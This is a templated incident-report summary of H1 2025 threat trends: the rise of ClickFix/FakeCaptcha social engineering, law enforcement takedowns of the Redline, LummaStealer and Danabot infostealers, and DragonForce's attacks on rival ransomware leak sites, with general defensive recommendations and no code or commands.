Full Report
Threat actors are embracing ClickFix, ransomware gangs are turning on each other – toppling even the leaders – and law enforcement is disrupting one infostealer after another
Analysis Summary
# Incident Report: Emergence of ClickFix, Infostealer Takedowns, and Ransomware Disputes (H1 2025)
## Executive Summary
The first half of 2025 saw significant shifts in the threat landscape, notably the rapid rise of the "ClickFix" social engineering technique, the successful disruption of several major infostealer operations by law enforcement, and unprecedented internal conflict ("deathmatch") among ransomware groups. While some threats like infostealers face disruption, new social engineering tactics are rapidly gaining prevalence.
## Incident Details
- **Discovery Date:** Specific discovery dates are not provided, but the report covers activity in H1 2025.
- **Incident Date:** H1 2025 (January to June 2025)
- **Affected Organization:** Not specified; focused on generalized threat trends and specific malware families/groups.
- **Sector:** Broad impact across various sectors due to malware and ransomware prevalence.
- **Geography:** Not specified, implies global scale based on threat report nature.
## Timeline of Events
Since this is a threat report summary and not a specific organizational incident, the timeline reflects threat emergence and takedowns across the landscape:
### Initial Access
- **Date/Time:** ClickFix technique began as non-existent a year prior, becoming the *second most prevalent threat* in H1 2025.
- **Vector:** Social engineering, specifically using a tactic dubbed **FakeCaptcha**, which weaponizes CAPTCHA verification mechanisms.
- **Details:** Victims are tricked into executing malicious commands under the guise of completing a human verification step.
### Lateral Movement
- Not individually detailed for a single incident, but implied as part of standard malware/ransomware operations discussed.
### Data Exfiltration/Impact
- **ClickFix:** Intended to execute malicious commands, likely leading to further compromise (credential theft, malware deployment).
- **Infostealers (e.g., LummaStealer, Danabot):** Information theft was the primary impact being disrupted by law enforcement.
- **Ransomware:** Internal conflict (Dragonforce vs. rivals) resulted in the defacement and takedown of rival Data Leak Sites (DLS).
### Detection & Response
- **Detection:** Detection efforts were highlighted by ESET Research contributions to global operations.
- **Response actions taken:** Law enforcement operations successfully disrupted major infostealer services, including **Redline/Meta Stealer** (late 2024), **LummaStealer**, and **Danabot**.
## Attack Methodology
This section summarizes the techniques highlighted in the general threat environment of H1 2025:
- **Initial Access:** ClickFix (specifically FakeCaptcha social engineering).
- **Persistence:** Not detailed.
- **Privilege Escalation:** Not detailed.
- **Defense Evasion:** Not detailed.
- **Credential Access:** Implied primary goal of disrupted infostealers (Redline, LummaStealer, Danabot).
- **Discovery:** Not detailed.
- **Lateral Movement:** Not detailed.
- **Collection:** Data harvested by infostealer-as-a-service operations.
- **Exfiltration:** Data theft related to infostealer victims.
- **Impact:** Data compromise (infostealers); disruption of criminal infrastructure via DLS defacement/takedowns (ransomware infighting).
## Impact Assessment
- **Financial:** Not quantified, but disruption of infostealer-as-a-service operations negatively impacts cybercriminal revenue.
- **Data Breach:** High volume of credential and information theft historically associated with the disrupted infostealers.
- **Operational:** Disruption of criminal infrastructure (DLS takedowns).
- **Reputational:** Not applicable to victims, but demonstrated instability among ransomware actors.
## Indicators of Compromise
As this is a summary of general trends, specific, current IOCs are not provided, only the categories of malware discussed:
- **Network indicators:** IOCs related to ClickFix infrastructure (unknown).
- **File indicators:** References to Redline/Meta Stealer, LummaStealer, Danabot, and Dragonforce malware/tools.
- **Behavioral indicators:** Execution of malicious commands following a CAPTCHA verification attempt (FakeCaptcha).
## Response Actions
Response actions highlighted were largely driven by law enforcement and security researchers:
- **Containment measures:** Law enforcement coordinated takedowns of established malware services.
- **Eradication steps:** Successful removal of infostealer operations (Redline, LummaStealer, Danabot) from the threat landscape, partly assisted by ESET research.
- **Recovery actions:** Not detailed for any specific victim organization.
## Lessons Learned
- **Key takeaways:** Social engineering methods like ClickFix can scale extremely rapidly, moving from non-existent to highly prevalent in less than a year. Infostealer-as-a-Service is a lucrative target for law enforcement takedowns.
- **What could have been done better:** Increased organizational vigilance against novel social engineering bypasses presented as common web interactions (like CAPTCHAs).
## Recommendations
- **Prevention measures for similar incidents:** Organizations and end-users must exercise extreme caution with mechanisms that require executing code under the guise of human verification (e.g., advanced CAPTCHA substitutes). Enhanced security awareness training focusing on emerging social engineering tactics is critical.